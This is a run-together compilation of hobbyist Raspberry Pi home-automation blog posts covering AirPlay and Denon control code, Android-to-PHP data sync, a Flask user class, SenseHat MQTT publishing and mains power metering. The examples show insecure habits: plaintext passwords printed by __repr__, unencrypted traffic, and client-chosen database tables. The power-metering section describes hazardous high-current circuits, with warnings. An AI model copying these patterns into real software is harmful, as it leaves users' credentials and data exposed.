    public static Computer NAS = new Computer(none, "nas", "nas.local", "admin", "00:22:3F:AA:26:65");
    public static AppleTV appleTv = new AppleTV(livingRoomHomeTheater, "appleTv", "10.0.0.30");
    public static HomeTheater homeTheater = new HomeTheater(livingRoomHomeTheater, "homeTheater");
    public static MqttSwitch tv = new MqttSwitch(livingRoomHomeTheater, "tv");
    public static Receiver denon = new Receiver(livingRoomHomeTheater, "denon", "10.0.0.8");
    public static MqttSwitch homeTheaterTv = new MqttSwitch(livingRoomHomeTheater, "tvSwitch");
    public static MqttSwitch homeTheaterDenon = new MqttSwitch(livingRoomHomeTheater, "denonSwitch");
}

The bottom two are Z-Wave outlets, which you've seen before. All the others are new types of devices. Below we'll describe each of them separately.

Let's start with the easiest device: the television. With the work we did yesterday in Home Theater part 1: CEC we can turn the TV on and off by sending a simple MQTT message, so it's defined as a MqttSwitch.

The Apple TV is a great device as the centre of the home theatre. It is able to control other devices through CEC, but unfortunately you can't control the Apple TV itself through CEC. So I had to look for an alternative, and I found it in AirPlay. Xyrion describes well how you can wake up an Apple TV by connecting to it over Telnet and telling it to play some bogus video.
In Java we can do this using a Socket. For this we'll create a new Command, the SocketCommand:

package nl.edubits.thuis.server.automation.commands;

public class SocketCommand implements Command {
    String hostname;
    int port;
    String body;

    public SocketCommand(String hostname, int port, String body) {
        // ...
    }

    @Override
    public Message runSingle() {
        try (
            Socket socket = new Socket(hostname, port);
            PrintWriter out = new PrintWriter(socket.getOutputStream(), true);
            BufferedReader in = new BufferedReader(new InputStreamReader(socket.getInputStream()));
        ) {
            out.print(body);
            out.flush();
            logger.info("Socket response: " + in.readLine());
        } catch (IOException e) {
            logger.log(Level.WARNING, "Socket failed", e);
        }
        return null;
    }
}

We use this command in the definition of the AppleTV itself. By extending MqttSwitch we can leverage the logic for updating its status from MQTT. I'm not entirely sure how we can turn off the Apple TV programmatically, so that method is not implemented yet.

package nl.edubits.thuis.server.devices;

public class AppleTV extends MqttSwitch implements Switch {
    String hostname;

    public AppleTV(Room room, String id, String hostname) {
        // ...
    }

    @Override
    public Command on() {
        return new SocketCommand(hostname, 7000,
            "POST /play HTTP/1.1\n" +
            "Content-Length: 65\n" +
            "User-Agent: MediaControl/1.0\n" +
            "\n" +
            "Content-Location:\n" +
            "Start-Position: 0\n" +
            "\n");
    }

    @Override
    public Command off() {
        // TODO
    }
}

My AV receiver is a Denon AVR-X2000. CEC support on this device is limited, but luckily there is an API. Unfortunately the API is not documented, but by using the web interface I could reverse engineer it. There are some quirks while it's starting up though, as it can take quite a while before the Denon is reachable through the API (while it already works when pressing the power button manually). Because of this we'll use a combination of both CEC and the API. First let's create the Receiver class itself. It's an extension of MqttSwitch, so the CEC part is easily taken care of.
We do override the on() method to make sure it's only fired when needed, as this command toggles the power status of the Denon. To get more detailed information on the status, and to change volume and inputs, we use the API. The API calls are performed by a DenonCommand.

package nl.edubits.thuis.server.devices;

public class Receiver extends MqttSwitch implements Device, Switch, Singable {
    private final String hostname;
    private Status status;
    private NowPlaying nowPlaying;

    public Receiver(Room room, String id, String hostname) {
        // ...
    }

    public boolean isFullyOn() {
        return isOn() && (status == null || status.getZonePower());
    }

    public boolean isFullyOff() {
        return !isOn() && (status == null || !status.getZonePower());
    }

    @Override
    public Command on() {
        if (!isOn()) {
            return super.on();
        }
        return null;
    }

    public DenonCommand volume(double value) {
        value = Math.max(0, Math.min(98, value));
        String volume = (value == 0) ? "--" : String.format("%.1f", value - 80);
        return new DenonCommand(this, "PutMasterVolumeSet", volume);
    }

    public DenonCommand input(Input input) {
        return new DenonCommand(this, "PutZone_InputFunction", input.getValue());
    }
}

Due to time limitations I won't go into the implementation of the API in this post. If you would like more details about this topic, there is a valuable article by Open Remote describing the key possibilities.

The NAS runs the Plex Media Server. When nobody is home the NAS is not used, so it is turned off by default. The NAS supports Wake-on-LAN (WOL), so we can use this to wake it up and make Plex available. For WOL I use a nice little library and built a command around it:

package nl.edubits.thuis.server.automation.commands;

public class WakeOnLanCommand implements Command {
    Computer computer;

    public WakeOnLanCommand(Computer computer) {
        // ...
    }

    @Override
    public Message runSingle() {
        try {
            for (int i = 0; i < 5; i++) {
                WakeOnLan.wake(computer.getMAC());
            }
            return new Message(String.format("Thuis/computer/%s", computer.getId()), "wake");
        } catch (IOException | DecoderException e) {
            logger.log(Level.WARNING, String.format("Waking up '%s' failed", computer.getId()), e);
        }
        return null;
    }
}

The Computer class used for the NAS is just a basic implementation of an Actuator using the WakeOnLanCommand for its wake() method, so I won't present its source code here.

Now that we have almost all the devices set up, we can combine them in scenes. Let's start with some code:

public static Scene homeTheaterBase = new Scene("homeTheaterBase",
    asList(
        highPriority(homeTheaterDenon.on()),
        waitForOn(denon.on(), homeTheaterDenon)
    ),
    asList(
        denon.off(),
        waitForFullyOff(homeTheaterDenon.off(), denon)
    )
);

public static Scene homeTheater = new Scene("homeTheater",
    asList(
        highPriority(NAS.wake()),
        homeTheaterTv.on(),
        illuminanceIsLowerOrEqual(livingMoodTop.on(), 70l),
        waitForOn(Devices.tv.on(), homeTheaterTv),
        waitForOn(appleTv.on(), denon),
        waitForOn(Devices.tv.on(), appleTv),
        waitForFullyOn(new ListCommand(asList(
            denon.input(Input.TV),
            denon.volume(50)
        )), denon)
    ),
    asList(
        Devices.tv.off(),
        livingMoodTop.off(),
        waitForOff(homeTheaterTv.off(), Devices.tv)
    )
);

Here the scenes are split in two. The homeTheaterBase scene is the basis for all the different home theater scenes: e.g. the one for the Apple TV displayed here, or the one for Blu-ray. It also allows me to switch from one to another without turning everything off. As you can see, lots of commands depend on each other, so devices have to wait for some other devices before starting up. The most obvious case is that you first have to turn on the power before you can turn on the device itself, or give the device more commands. The receiver has a special qualifier, waitForFullyOn: this is because it has two stages of powering on.
First CEC reports it's turned on (this is the normal on-state), and later the API reports the powered-on status as well (the fully-on-state). We're interested in both of them, as it's not possible to send any commands through the API before it reaches the fully-on-state.

Time for a quick demo. Note: as this is a demo, the launch takes a bit more time than usual. Please be patient.

There is one thing left to integrate: Plex! This will be the subject of part 3.

This module is actually made of two parts, but both are based on weighing things, and both can be implemented for more than laundry.

1. Notification when you have enough dirty clothes to make a washing cycle

Most washing machines have a limit to how many clothes they can wash in one cycle, based on weight. The first part is a scale that tells you when you have reached that weight. For this I first imagined making three drawers (one for whites, one for blacks and one for colors), and the system could notify me when one of the drawers is close to the washing machine's limit.

2. Notification for how many washing cycles you can do with your available detergent

As mentioned before, this is also based on weighing things, in this case the bag of detergent. Even if there are small fluctuations, the quantity of detergent you use for a wash is almost the same. The system can take the quantity missing between two different measurements as the quantity needed for one wash, and make an average. This way it can tell you at any time how many washing cycles you can still do, and you can consult this when you are shopping and don't know whether you need to buy detergent or not.

One thing to take into consideration is to build logic that handles unusual readings. For example, you can take the box off the scale when you use it, and the system would add to the statistics that you used 5 kilos of detergent; so it has to disregard this reading by not taking 0 into consideration.
Another possibility is that you use some detergent for something else, or lend some to another person. In this case there will be an abnormal usage, and the system should only persist this quantity and take it into consideration if it repeats a couple of times. The third thing to handle in the implementation is the adding of new detergent: the system should reset the quantity it takes into consideration, but again, you could press on the scale with your hand while filling the detergent box at the same moment the system is reading the weight, so this case has to be handled too. For this I think it would be safe to only take into consideration values that persist for half an hour.

The whole calculation for this system would take place on the Raspberry Pi, and a weight sensor could be attached to it using the same I2C protocol described in the previous posts. The sensor would only send the weight to the main server, and all the calculation would take place there.

This system can be used for anything else that you use in a consistent manner, for example coffee: I for one use roughly the same amount of coffee every morning. Since the actual weights are not needed (the calculation is based on the statistics of your usual consumption), you can use it on anything.

Before note: I am not an electrical engineer, nor do I have experience working in this field. Please double check anything I say in this post before trying it yourself.

Previous posts:
Pi IoT - Simone - Introduction
Pi IoT - Simone - #1 - Light Controller
Pi IoT - Simone - #2 - Main System
Pi IoT - Simone - #3 - Door / Window notifier

For this part of the project the main idea is to have a device that can calculate the power consumption of each wall outlet individually. This can give you a good statistic of the power consumption, and it can help you minimize the energy needed to run your house. The control part comes with the ability to turn the sockets on and off.
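The detergent-tracking rules described above (disregard zero readings, only trust values that persist, average the drop between two stable measurements as one wash) could be sketched roughly like this in Python. The class, the gram values and the stable-reading threshold are my own illustration, not code from the project; the "persists for half an hour" rule is stood in for by requiring several identical consecutive readings:

```python
class DetergentTracker:
    """Track detergent weight readings and estimate remaining wash cycles."""

    def __init__(self, stable_count=3):
        self.stable_count = stable_count  # readings in a row before a value is trusted
        self._candidate = None
        self._seen = 0
        self.accepted = []   # accepted stable weights, in grams
        self.per_wash = []   # observed per-wash usage, in grams

    def add_reading(self, grams):
        if grams <= 0:  # box lifted off the scale: disregard, per the rule above
            return
        if grams == self._candidate:
            self._seen += 1
        else:
            self._candidate, self._seen = grams, 1
        if self._seen == self.stable_count:
            self._accept(grams)

    def _accept(self, grams):
        # A drop relative to the last stable value counts as one wash;
        # an increase (a refill) is accepted without recording usage.
        if self.accepted and grams < self.accepted[-1]:
            self.per_wash.append(self.accepted[-1] - grams)
        self.accepted.append(grams)

    def cycles_left(self):
        if not self.per_wash or not self.accepted:
            return None
        avg = sum(self.per_wash) / len(self.per_wash)
        return int(self.accepted[-1] // avg)


tracker = DetergentTracker()
# 5 kg stable, box lifted (zeros), then two washes of ~100 g each:
for reading in [5000] * 3 + [0, 0] + [4900] * 3 + [4800] * 3:
    tracker.add_reading(reading)
print(tracker.cycles_left())  # 48 cycles left at ~100 g per wash
```

In the real system the readings would arrive over I2C and the estimate would live on the main server, but the statistics are the same.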
Mostly this feature is not very useful, but if you have kids, for example, you could turn a socket on for only two hours so you can charge your phone, and afterwards it is safe for the kids to play around. This is only an example, but you can find other uses for it. The switch part is the same as the one for the light switches: it acts the same way and it has a relay, so it can be implemented the same way. One thing to take into consideration is the power consumption versus the limit of the relay you are using, or you could burn it very easily.

The main challenge of this part of the project is to make a component that can accurately calculate the power consumption even for small consumers. The I2C protocol described in the previous posts is good enough to send the information to the Raspberry Pi, and it has the processing power to display it in any form needed.

I will get more into details, but first I would like to say that this is very dangerous and should not be attempted by someone who does not have experience working with high currents. Also spend a while searching online for discussions and topics about this, and for safety advice. If you do want to go ahead with this, here are some things to take into consideration, one by one, before plugging in a device:

1. Reconsider if you really need to do it and if it is worth it.
2. Make sure the component is not plugged in while you are arranging everything for the test.
3. Make sure you are at least one meter away from the device during the testing phase when it is plugged in. You don't know for sure what will happen, and mistakes can be made.
4. It is better to have somebody with you at a safe distance so they can help, but in case you are working alone, make sure there are no people in the area so they do not touch anything by mistake.
5. Remove all animals from the room.
6.
Make sure you isolate your component well from anything that might be a conductor (I burned a component because it made contact through a wooden floor).
7. You should always be able to cut the power at any time, without getting close to the component you are testing.
8. Minimize the damage if anything goes wrong by keeping the device away from other instruments you use and not connected to anything.
9. Try to develop a way to see the readings from a distance, or record them onto something, so you don't have to get close.
10. Make sure your calculations are right and double check them.
11. Reconsider again if you really want to do this.
12. Never leave the component unsupervised while plugged in, unless it is well tested and well isolated.

Please comment below any thoughts on this and I will add them to the list above. I would be glad if this list could become a genuine checklist of things to consider before testing components with high current. Now that this is said, here are some options that can be used to calculate the power consumption:

1. The safest way to do this (not really safe, but safer than the others I know) was mentioned to me in a previous post by jc2048, and it refers to the SCT 013-030. More details can be found at 3. AardEnergy – Current and Voltage Transformers. Again, thank you Jon for the advice.

2. A nice component that I found is this one: It works pretty well, but it is not a non-intrusive solution like the one above. I for one tried to replicate it and ended up with a pretty good current sensor (though it looks horrible, mostly because I bought the wrong size trimmers).

3. The device that I mentioned in the lights controller blog (Pi IoT - Simone - #1 - Light Controller). The schematic is below. There should be an operational amplifier on the receiving end of the device. I have to mention that this is by far the unsafest of the three mentioned here.
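Whichever sensor you choose, the Pi ends up with a stream of instantaneous current samples, and the useful quantity is the RMS current multiplied by the mains voltage. A small Python sketch of that calculation (the 230 V mains value and the synthetic sample data are assumptions for illustration):

```python
import math

def rms(samples):
    """Root-mean-square of a list of instantaneous readings."""
    return math.sqrt(sum(s * s for s in samples) / len(samples))

def apparent_power(current_samples, mains_voltage=230.0):
    """Apparent power in VA from current samples. Real power would also
    need the phase angle (power factor), which this sketch ignores."""
    return rms(current_samples) * mains_voltage

# One full 50 Hz cycle of a 1 A-amplitude sine wave, sampled 100 times:
samples = [math.sin(2 * math.pi * i / 100) for i in range(100)]
print(round(rms(samples), 3))          # 0.707 A, i.e. amplitude / sqrt(2)
print(round(apparent_power(samples)))  # 163 VA at 230 V
```

Sampling over whole cycles matters: the RMS of a partial cycle is biased, which is one reason small consumers are hard to measure accurately.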
Below is a picture of the one I used. It worked until (as mentioned before) it made a connection through the floor and blew, taking along with it on the friendly ride an Arduino board, an ATTiny, some pins on a Raspberry Pi, my computer's motherboard and a fuse. (The fuse was easy to replace, so see again item 8 on the list above.) Make sure for something like this that the resistor can handle the power consumption of the socket. For this list too, let me know if you have other ideas and I will add them. I will continue this post with more information about this component when I have some progress.

To finish the Android competition application, I need to add the "updating functions". That is, send the not-yet-updated information to the Central Node (web server) and wait for a confirmation. If the confirmation arrives, the information is in the Raspberry Pi 3; when no confirmation is received, the data should be resent in the next cycle. This will require:

We are focusing on the smartphone to central node communication. Data flow will start from the phone (client) to the central node (server).

1) The user's node sends an HTTP_POST containing: The server checks the id, and if it is the right one, it will extract the tracked distance information.
2) This information is saved into the database (created in post #5) to be accessed later on by the main GUI.
3) If writing is successful, a response is sent back to the phone.
4) The data packet structure is that of an HTTP_POST. The message, however, will contain a String in JSON Array format: this way, I can send several samples (several rows of the database), each of them in a key:value format. As a result, when the server receives the HTTP_POST, it will be easy to extract and identify each value.

(*) NOTE - SECURITY. There is no protection against eavesdropping, nor any security whatsoever. Traffic between the user's node and the central node should at least be encrypted in the future.
Initial setup: Nexus 5 / Android / SmartCompetitionHome App v1

I include a new Java class in the project: ServerConnector.java. It makes use of the libraries: This class implements an AsyncHttpResponseHandler (asyncHttpResponseHandler), which defines two callbacks: onSuccess (when we obtain a successful response from the server) and onFailure (when we get some error). As stated before, this is an asynchronous wait which will not freeze the app while the server response is traveling back. The class also holds fields with the server information: the URL to send data to, the JSON ID, etc.

Another important characteristic is the JSON String formatting of packages. To create this structure, the class implements a convertToJSON method to obtain the desired JSON Array object from a List of Map<String, String>:

public String convertToJSON(List<Map<String, String>> args) {
    String json = "";
    Gson gson = new GsonBuilder().create();
    // Use GSON to serialize the Array List to JSON
    try {
        json = gson.toJson(args);
    } catch (Exception e) {
        System.out.println("Could not convert to JSON!: " + e);
    }
    return json;
}

So, the call to send a package to the server is as follows:

/**
 * sendToCentralNode()
 * Function to send a JSON object to the central node server
 */
public void sendToCentralNode(String json, String url) {
    if (url != null && !url.equals("")) {
        System.out.println("Sending: " + json);
        System.out.println(url);
        // Set parameters
        RequestParams params = new RequestParams();
        params.put(_JSON_ID, json);
        // Send http request
        httpClient.post(url, params, asyncHTTPClient);
        sending = true;
    } else {
        System.out.println("Empty URL - Not sending");
    }
}

The app should be able to send the data automatically (instead of having a SEND button). This could be done with a timer, every X seconds. However, I will use an even simpler solution, since data recording does not have a high sample rate, nor do I need a lot of computation to process the track information: data will be sent every 5 new locations detected.
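The same packaging and acknowledgement flow can be sketched in Python: serialize only the rows flagged synchronized = 'no' into a JSON array, then flip the flag once the server's response confirms each row. The field names mirror the post, but the helper functions are my own illustration; the actual HTTP POST would go through an HTTP library on the phone side.

```python
import json

def rows_to_json(rows):
    """Serialize a list of row dicts into the JSON array the server expects."""
    return json.dumps(rows)

def apply_ack(local_rows, ack_rows):
    """Mark local rows as synchronized when the server's response confirms them."""
    confirmed = {r["date_time"] for r in ack_rows if r.get("synchronized") == "yes"}
    for row in local_rows:
        if row["date_time"] in confirmed:
            row["synchronized"] = "yes"
    return local_rows

# Two locally recorded samples that have not been sent yet:
rows = [
    {"table_name": "competition", "date_time": "2016-08-01 10:00:00",
     "distance": "1.2", "synchronized": "no"},
    {"table_name": "competition", "date_time": "2016-08-01 10:05:00",
     "distance": "2.4", "synchronized": "no"},
]

payload = rows_to_json(rows)      # body of the HTTP_POST
ack = json.loads(payload)
for r in ack:
    r["synchronized"] = "yes"     # pretend the server stored everything

rows = apply_ack(rows, ack)
print([r["synchronized"] for r in rows])  # ['yes', 'yes']
```

If the ACK never arrives, the flags stay 'no' and those rows are simply included again in the next cycle, which is exactly the resend behaviour described above.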
The code is found in CompetitionTrackActivity:

if (num_locations == _LOCATIONS_TO_SEND) {
    num_locations = 0;
    List<Map<String, String>> notUpdated = myDB.getAllNotUpdatedValues(user_name, columnsTable,
            DatabaseManager.upDateColumn, DatabaseManager.updatedStatusNo);
    mServer.sendToCentralNode(mServer.convertToJSON(notUpdated), mServer.WRITE_URL);
}

(*) getAllNotUpdatedValues reads from the database all values that were not updated.

In order to keep the databases on the server and on the phone in sync, we use an extra column to flag the state of each sample ("synchronized"). This way, when we send data, we only send samples with synchronized = 'no'. Afterwards, when the ACK arrives from the server, this synchronized flag is turned into a 'yes'.

Initial setup: Raspberry Pi 3 - Raspbian OS (Jessie) / SSH enabled / Mosquitto MQTT broker installed / MQTT subscriber client / Console interface / Python GTK interface / MySQL server / Apache2 web server

In post #5 I showed how to do port forwarding from the WiFi router to the central node. I used port 80 to have web traffic redirected to the web server on the Raspberry Pi 3 (also using port 80). However, for the competition service I will be using another port. It can be done in two steps:

The server will be receiving HTTP POST requests from the phone. It will make sure it is the intended data, then decode it and try to save it into the database. Therefore, the process for any new request is:

1. Obtain the JSON Array Object

$json = $_POST["id_for_JSON"];

// Remove slashes
if (get_magic_quotes_gpc()) {
    $json = stripslashes($json);
}

// Decode JSON into an Array
// Json structure:
// {var data = ['{"table":"Name of table"}', '{"column1":"value1",..,"columnN": "value2"}'];}
$data = json_decode($json);

2.
For each JSON Object, try to store it in the database

for ($i = 0; $i < count($data); $i++) {
    // Get keys of JSON for sensors values
    $res = $db->storeInTable($data[$i]->table_name, $data[$i]->date_time, $data[$i], $data[$i]->synchronized);
    // Build the array to send back
    $response[$i] = $res;
}

(*) storeInTable is the function I designed to store each sample in the database. It requires the table_name, date_time and synchronized fields to be passed separately; the other values can be stored automatically. During the process we also generate the $response, which will be encoded into another JSON packet. The difference will reside in the 'synchronized' flag: if the data was successfully stored in the database, 'synchronized' is turned to 'yes' so that the phone can then update its own local database.

We have our complete competition application. Which means that, right now, the platform can: To finish the platform, we will have to update our main GUI! That's right!

What's an episode without the "made for TV" suspense? I suspect that the blogging application is "downscaling" my videos, which resulted in previous episodes being somewhat blurry. This episode was generated using the highest resolution available. When viewing it, make sure that you use full screen mode and let me know if the text is sharp and clear. I hope you have found this useful and informative. Rick

Oftentimes it seems that as programmers, or anything else for that matter, we get caught up in a particular pattern for doing things. One that I see quite often is the use of SQL databases in various projects. The "kids" these days are introduced to SQL as a primer for programming and can't think how to handle persistence without it. To show that life can exist without a formal database, HangarControl is being written using some very simple mechanisms for creating, reading, and updating information. In a future episode, I will discuss the Flask-Login module.
Flask-Login is a set of helper routines to streamline user session management. As it is written in Python, it expects that your users can be accessed as "User" objects. One might be tempted to just fire up SQLAlchemy (SQLAlchemy - The Database Toolkit for Python) and start creating a database. Instead, we're going to create a class that provides everything needed without the overhead of a database manager. According to the documentation, Flask-Login requires the following properties and methods: We can easily provide these directly from our favorite text editor. I have broken up the various portions for discussion purposes; trust that together they make up the 'user.py' file.

# Get a template object for our User record.
from flask_login import UserMixin

class User(UserMixin):
    # This is an array that will be shared across all instances of this class
    users = []

    # This method is automatically called when a new instance of User is created.
    # Notice at the end where the *class* User appends this new instance to our
    # users list. Just think "SQL insert".
    def __init__(self, username, acctnum, password=None, fullname=None, active=True):
        self.username = username
        self.acctnum = acctnum
        self.fullname = fullname
        self.password = password
        self.active = active
        User.users.append(self)

Here is something that I recommend you do that just makes your (debugging) life so much easier: create a method for rendering your object in a human-readable form!

    # Any class that you create should implement __repr__. This provides a
    # convenient method to display a human readable representation of your object.
    def __repr__(self):
        return "<User username:%s acctnum:%s password:%s fullname:%s>" % \
            (self.username, self.acctnum, self.password, self.fullname)

If you've done any work with Python, the above pattern is pretty familiar. Next we implement the methods that Flask-Login is expecting from us.
    # These are required by the Flask-Login module
    def is_active(self):
        return self.active

    def is_anonymous(self):
        return False

    def is_authenticated(self):
        return True

    def get_id(self):
        return self.username

The final portion of our User class is the piece that makes all this "what's a database anyway?" talk complete. Here we are simply defining a mechanism, or language if you will, to query User records in a structured way. Ooh, see what I did there? (Okay, "... structured ... query ... language ...") That's okay, my kids didn't think it was funny either.

    # The @classmethod decorator (think "modifier") makes the method definition
    # available by this syntax: "User.find_by_attr(...)". The important concept
    # is that this method isn't used by individual 'user records', rather the
    # collection of all 'user' records.
    @classmethod
    def find_by_attr(cls, key, target):
        for user in cls.users:
            if getattr(user, key) == target:
                return user
        return None

    @classmethod
    def find_by_username(cls, target):
        return cls.find_by_attr('username', target)

Now that we have an implementation of a User, let's take a look at how it will be utilized.

$ python
>>> from lib.user import User
>>> User('admin', 0, 'pilot', 'Administrator')
<User username:admin acctnum:0 password:pilot fullname:Administrator>
>>> User('pilot', 142, 'secret', 'Ima Pilot')
<User username:pilot acctnum:142 password:secret fullname:Ima Pilot>
>>> User.users
[<User username:admin acctnum:0 password:pilot fullname:Administrator>, <User username:pilot acctnum:142 password:secret fullname:Ima Pilot>]
>>> User.find_by_username('admin')
<User username:admin acctnum:0 password:pilot fullname:Administrator>
>>> User.find_by_username('whodat')
>>> User.find_by_username('whodat') == None
True

I hope you have found this useful and, in the future, aren't afraid to "go naked" and skip the SQL database! Rick

In my last post I shared the variety of boxes I found at the local Walmart, ranging in price from 25 cents to 10 cents.
Today I had a chance to try 2 of them on for size and fit, and quickly decided the midsize one seems almost made for a Raspberry Pi implementation with the 7 inch Touchscreen! If I remember correctly it was also only 10 cents! As I had mentioned, the idea was to take the Farm Operations Center setup out of its base setup, which was no container at all with everything hanging out in the open air, to the more protected containment system of a box. Looking around there were a variety of interesting cases that could be ordered or made with a 3D printer, but I don't have a 3D printer, yet, and I wanted flexibility to add parts and pieces easily without worrying about outgrowing the containment. One item I am really looking forward to is adding a battery to make it portable, so some extra space was a must. As such I looked into the larger of the 3 cases first, cutting out a hole large enough to slip the metal frame on to allow screws to be drilled through the case, securing it. My original hole was in the top of the case, I think mainly because a case is designed with the top up, so that is what I tried. :-) Here I am showing the F.O.C. mounted to the large box. Another box is shown above to give you an idea of depth for expansion. While this wasn't bad, there were 2 issues from my point of view. First, mounting to the top of the case, the lid, just wasn't the best option for being able to run cables through the main box, since you would have to carefully open the lid every time, watching all of the cable routing. Second, it just didn't feel comfortable in my hand. That extra depth made it feel like a plastic brick. If you don't plan on holding the F.O.C. Box and just want a containment system to set to the side and use perhaps with an external keyboard and mouse option, then the larger box is not a bad way to go. Especially for only 25 cents. Here is the mid-sized option. Just a tad smaller in the depth.
It looks even smaller than it is because this time I flipped the box over and used the bottom to mount the screen. This fits my hand much better and I can imagine using the touchscreen, and the potential of a battery setup, very easily with this in place. It is hard to tell in this picture, tomorrow I will try to get a new picture with the screws in place and everything wired in, but for now if you look at the 4 plastic squares on the box, they actually line up perfectly with the metal mounting spots on the RPi Screen. As you can see from the bottom box that I have not cut into, the little squares are recessed, and the extruded part of the metal frame fits right into those, making for a great fit once you take some washers and screws and fit it together! 10 cents is not a bad price either; in fact I spent more on the screws and washers than on the boxes. Here we have the new F.O.C. Box sitting in front of my laptop, with both of them connected to the MotionEyeOs RPi B+. The odd picture is actually my ceiling fan & light reflected in the outside window. The latch of the box works great as an angle provider for the box to be used in a standing position. I am very pleased with how this came together! I want to actually be able to mount it above my laptops in my desk area in the future and I think the Box will allow for that easily.

***********************************************************************************************************************************************************************

On the Farm/Fowl side of things I wanted to share just how incredibly fast ducks can foul their water. It is crazy! It also makes for great tree watering supply but still, yuck! Here is a picture of one of the ducklings being introduced to the pool and enjoying it quite a bit! We previously had the ducklings and baby keats in the garage. Word of caution to potential duck owners: ducklings like to play in their water, and that quickly makes the entire garage smell very very bad!
We had a pretty good rain, so the ducks had tracked even more than the normal amount of dirt into the water, making it look not quite so refreshing to me. So today was Duck Water Refresh day. Ah, clean water! We won't even wait to let it fill up the pool! Here we have some more water in the pool, and you may notice that the clean part seems to be diminishing. Kind of like bath water now. :-) I guess "clean" water is a somewhat broad term when it comes to ducks. But boy are they happy!

I was waiting for the new sensehat to reach me before writing this post, but the recent updates suggest that I may not get it before the deadline. So I decided to go on with the faulty one I have. Although the code will work regardless of the sensehat condition, the output I am showing here will be faulty because of my hat. In this post, I'll be getting data from the sense hat and publishing it to an MQTT broker. Later this data is displayed as a freeboard dash with the MQTT plugin.

Hardware Setup

This post will be using the SenseHat I got as a part of the challenge kit. SenseHat for raspberry pi is an add-on board which houses For more details about SenseHat, visit Raspberry Pi Sense HAT or

The sensehat can be mounted on the raspberry pi (here I use a Pi3) with the screws provided with the sensehat. It will look like: Next is to install the libraries for sensehat. To install them:

$ sudo apt-get update
$ sudo apt-get install sense-hat

This will install the c/c++ and python libraries for using the sense hat. Now you need to restart the system for the changes to take effect:

$ sudo reboot

Now you should be able to use the SenseHat.

Software Setup

For this post, I'll be using a python script which will read the values from the environmental sensors and publish them using MQTT to the topic 'usr/vish/sensehat'. Each packet will be a JSON object like:

{"pressure":"1010.0576171875","temperature":"-422.7525634765625","humidity":"-39.87132263183594"}

For this, we'll be using the Paho MQTT python client library.
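As an aside, a packet like the one above can be produced with Python's standard json module instead of hand-built string formatting. A sketch with fake readings standing in for the real sensor values (no SenseHat required):

```python
import json

# Fake readings standing in for sh.get_humidity() etc. -- this sketch
# does not touch the sense-hat library.
dataPacket = {
    "humidity": -39.87132263183594,
    "pressure": 1010.0576171875,
    "temperature": -422.7525634765625,
}

# json.dumps handles quoting and escaping; sort_keys makes the output stable
mqttPacket = json.dumps(dataPacket, sort_keys=True)
print(mqttPacket)
```

Note that json.dumps emits the numbers unquoted, unlike the string-quoted values in the packet above; a subscriber parsing with a JSON library handles either form.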
Installation of the library is described in [PiIoT#06]: Ambient monitoring with Enocean sensors. Once the library is installed, we are ready to go. To get the sensor values the script is roughly like this:

## Init Sensehat
import sense_hat as sHat

sh = sHat.SenseHat()

# Function to read the sensor and send data
def senseNsend( client ):
    dataPacket = {}
    # Get environmental sensors data from sense hat
    dataPacket['humidity'] = sh.get_humidity()
    dataPacket['pressure'] = sh.get_pressure()
    dataPacket['temperature'] = sh.get_temperature()
    mqttPacket = "{" + ','.join( '"%s":"%r"' %(k,v) for (k,v) in dataPacket.iteritems() ) + "}"
    # Now send 'mqttPacket' to broker
# End of Function

More documentation on using the environmental sensors on SenseHat can be obtained from

The next step is to create an MQTT broker connection and send the actual packet.

import paho.mqtt.client as mqtt
import paho.mqtt.publish as publish

basePath = 'usr/vish/'
appPath = 'sensehat'

# MQTT Broker Params
mqtt_broker = "192.168.1.54"
mqtt_port = 1883

## Define MQTT callbacks
def onConnect( client, userData, retCode ):
    print "Connected to broker."
    client.publish( basePath+'devices/sensehat', '{"name":"sensehat","desc":"Sensehat to MQTT bridge"}' )

client = mqtt.Client( client_id = "sh2mqtt_bridge", clean_session = True )
client.on_connect = onConnect
client.connect( mqtt_broker, mqtt_port, 60 )
client.loop_start()

This will create a client named 'sh2mqtt_bridge' and connect it to the IP at mqtt_broker. Now we can publish a packet to the broker with:

client.publish( basePath+appPath, mqttPacket )

Here I have put the topic to publish as basePath+appPath = 'usr/vish/sensehat'. The complete code is attached for your reference. You can use one of the MQTT debugging tools like MQTTSpy to monitor the messages in the topic 'usr/vish/sensehat'.

Designing the dashboard

Now we will be using freeboard to design the dashboard for viewing data.
I have already explained how to host freeboard with nodejs in [PiIoT#01]: Designing a dash board, and the Freeboard MQTT plugin in [PiIot#04]: Freeboarding with MQTT. Follow the instructions and start your freeboard server. Follow the instructions to create the dashboard: Finally your dashboard will look like this: You will be able to view the values sent by your sensehat (note that here the values are faulty because of my Sensehat). Now you can save this to the 'www/freeboard/dashboards' directory of your nodejs script as 'senseHat.json'. The file is attached below. To view the dashboard later, go to http://<freeboard host IP>:8080/#source=dashboards/senseHat.json.

Sense Your Environment

For the demo, I have modified the update interval to 3 sec. Below is a video of the demo where I'm using my android phone's chrome to view the sensehat data.

Happy Coding,
vish

During these last 2 days and before the official end of the Challenge, I have managed to integrate my Foscam IPCam into the DomPi project. This will probably be the last post with some solid progress. Let's go into the details!

Previous Posts

Project Status

At home I have an IPCam like the one in the picture below. The reason for leveraging this ipcam instead of the PiCam is based on two points: These two days I have made one additional improvement to a previous rule. I added some fine tuning to the alarm, so that when the Alarm Switch is activated, it resets the Alarm Status by turning it off. These are some snapshots of the final view of the openHAB web interface for DomPi. This is the final dashboard of the nodes. I am conscious that not all of the cells are green, but I hope that you have enjoyed the journey since May till now with the DomPi project.

An important part of Thuis is the integration of our Home Theater system. As the integration is quite extensive and consists of several components, this will be a 3-part blog series.
In the first part we start with communicating to CEC-enabled devices from a Raspberry Pi. In the second part we will integrate CEC with the rest of Thuis, and make sure everything works properly together. In the third - and last - part of the Home Theater series we will add the support for Plex. Let's start with a short introduction of CEC itself. CEC stands for Consumer Electronics Control and is a feature of HDMI. CEC enables HDMI devices to communicate with each other. In the ideal situation this means a user only needs one remote control to control all his devices: TV, AV receiver, Blu-ray player, etc. Unfortunately many manufacturers use their own variation of CEC and therefore in a lot of cases one still needs multiple remotes. To get an idea about the protocol have a look at CEC-O-MATIC, this is a great reference for all available commands! The good news is that the GPU of the Raspberry Pi supports CEC out of the box! To be able to handle the different dialects of CEC, Pulse Eight developed libcec. It enables you to interact with other HDMI devices without having to worry about the communication overhead, handshaking and all the differences between manufacturers. In contrast to what I mentioned in [Pi IoT] Thuis #5: Cooking up the nodes – Thuis Cookbook, Raspbian Jessie nowadays provides version 3.0.1 in the Apt repository, so there is no need to use the version from Stretch anymore. I've updated the cookbook 